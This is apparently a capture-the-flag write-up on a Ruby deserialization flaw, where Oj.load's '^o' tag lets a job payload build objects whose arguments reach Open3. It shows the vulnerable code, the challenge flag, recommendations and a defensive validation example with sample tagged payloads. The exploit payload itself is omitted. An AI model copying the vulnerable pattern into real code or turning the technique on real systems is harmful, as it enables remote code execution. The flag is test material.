January 2026

Insecure Ruby Deserialization Leading to RCE

Summary

A vulnerability in the Ruby job processing application allows unauthenticated attackers to execute arbitrary commands. The vulnerability is caused by insecure deserialization of user-controlled JSON payloads.


Description

The application uses Oj.load() to deserialize JSON payloads from queued jobs without proper validation. The Oj library supports object instantiation through special JSON syntax ("^o"), which allows attackers to instantiate arbitrary Ruby classes with attacker-controlled parameters.

Vulnerable Code

require 'oj'
require 'open3'

data = Oj.load(job.payload)   # Oj.load honours the "^o" object tag: the payload chooses the class and its instance variables
RubitMQ.new(data).run()

def run_find()                # inside RubitMQ: @args is taken directly from the deserialized payload
  puts Open3.capture3("find", *@args)
end

Proof of Concept

Malicious Payload

Result

This payload extracts the FLAG environment variable.

Flag

FLAG{Th4t_J0b_D1d_N07_Go_A5_Exp3ct3d}


Impact Assessment

Confidentiality Impact: HIGH

  • Full access to environment variables

  • Ability to read any file on the system

Integrity Impact: HIGH

  • Arbitrary file modification or deletion

  • Database manipulation

Availability Impact: HIGH

  • System resource exhaustion

  • Critical file deletion

  • Service disruption or complete system compromise


Root Causes

  1. Insecure Deserialization

  2. Insufficient Input Validation

  3. Command Injection

  4. Lack of Authentication

  5. Principle of Least Privilege Violation


Recommendations

  • Disable the vulnerable endpoint until patches are deployed

  • Replace Oj.load with safe alternatives

  • Add authentication and authorization to job submission endpoints

  • Add type checking and sanitization of job parameters before use

  • Implement sandboxing for job execution

  • Review entire codebase for similar vulnerabilities
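As an added example, not code from the report or the application, the following shows the Description's point and the "safe alternative" plus "type checking" recommendations together: the payload is parsed with Ruby's stdlib JSON parser, which never instantiates objects from the document, and then checked against an exact shape before any job object is built. The "args" key, MAX_ARGS and the helper names are assumptions for illustration; the sample payloads are constructed.

```ruby
require 'json'

MAX_ARGS = 16                                    # assumed limit for this example
class UnsafePayload < StandardError; end

# Constructed sample payloads. Oj.load would turn the "^o" tag into an
# arbitrary object; JSON.parse leaves it as an ordinary string key.
SAFE_PAYLOAD    = '{"args": ["/var/app/jobs", "-name", "*.log"]}'
TAGGED_PAYLOAD  = '{"^o": "RubitMQ", "args": ["/etc/passwd"]}'
NESTED_PAYLOAD  = '{"args": [{"^o": "SomeClass"}]}'
NON_OBJ_PAYLOAD = '["not", "an", "object"]'

# Parse with the stdlib parser (no create_additions, no "^o" handling),
# then validate before anything is constructed from the data.
def parse_job_payload(raw)
  data = JSON.parse(raw, create_additions: false, max_nesting: 10)
  validate_payload!(data)
  data
end

# Accept exactly {"args": [String, ...]} and nothing else.
def validate_payload!(data)
  raise UnsafePayload, 'top level must be a JSON object' unless data.is_a?(Hash)
  reject_directive_keys!(data)
  raise UnsafePayload, 'unexpected keys' unless data.keys == ['args']
  args = data['args']
  raise UnsafePayload, 'args must be an array' unless args.is_a?(Array)
  raise UnsafePayload, 'too many args' if args.length > MAX_ARGS
  raise UnsafePayload, 'args must be strings' unless args.all? { |a| a.is_a?(String) }
  raise UnsafePayload, 'NUL byte in arg' if args.any? { |a| a.include?("\0") }
end

# Walk the whole tree: Oj's object-mode directive keys all begin with '^',
# so any such key anywhere in the document is rejected outright.
def reject_directive_keys!(node)
  case node
  when Hash
    node.each do |k, v|
      raise UnsafePayload, "directive key #{k.inspect}" if k.start_with?('^')
      reject_directive_keys!(v)
    end
  when Array
    node.each { |v| reject_directive_keys!(v) }
  end
end

# Convenience wrapper: true if the payload passes parsing and validation.
def payload_accepted?(raw)
  parse_job_payload(raw)
  true
rescue JSON::ParserError, UnsafePayload
  false
end
```

If the Oj dependency must stay, the same validation applies after Oj.safe_load or Oj.load with mode: :strict, both of which also refuse to instantiate objects from the document.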
